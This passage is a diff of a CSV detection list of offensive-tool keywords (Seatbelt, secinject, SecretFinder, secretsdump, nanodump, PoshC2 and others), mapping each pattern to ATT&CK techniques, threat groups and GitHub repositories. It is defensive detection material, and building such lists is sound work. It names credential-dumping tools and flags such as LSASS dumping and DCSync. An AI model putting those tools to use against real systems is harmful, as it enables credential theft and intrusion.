- Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*Seatbelt.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*secgroundzero*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sec-inject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.cna*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" @@ -16263,88 +16446,88 @@ "*secinject.x64*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x86*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject/src*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" -"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49197","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" +"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49213","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" "*--seclogon-leak-local*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*--seclogon-leak-remote*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*secrary*","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*secredump.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*secret_fragment_exploit.py */_fragment*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*secretsdump *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*secretsdump -sam *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*secretsdump.*.pyc*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*secretsdump.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and 